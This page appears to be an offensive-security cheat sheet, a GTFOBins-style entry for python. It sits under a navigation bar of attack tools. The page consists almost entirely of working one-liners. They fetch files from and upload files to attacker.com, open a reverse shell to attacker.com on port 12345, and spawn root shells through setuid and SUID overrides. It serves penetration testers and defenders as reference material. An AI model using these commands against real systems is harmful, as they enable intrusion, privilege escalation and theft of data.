🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐚 GTFOBins / python

python

Download

python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve("http://attacker.com/path/to/input-file", "/path/to/output-file")'

File Read

python -c 'print(open("/path/to/input-file").read())'

File Write

python -c 'open("/path/to/output-file","w+").write("DATA")'

Library Load

python -c 'from ctypes import cdll; cdll.LoadLibrary("/path/to/lib.so")'

Reverse Shell

python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect(("attacker.com",12345))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'

Shell

python -c 'import os; os.execl("/bin/sh", "sh")'

CAPABILITIES override:

python -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'

SUID override:

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Upload

python -c 'import sys
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen("http://attacker.com", open("/path/to/input-file", "rb").read())'
python -c 'import sys
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", 12345), s.SimpleHTTPRequestHandler).serve_forever()'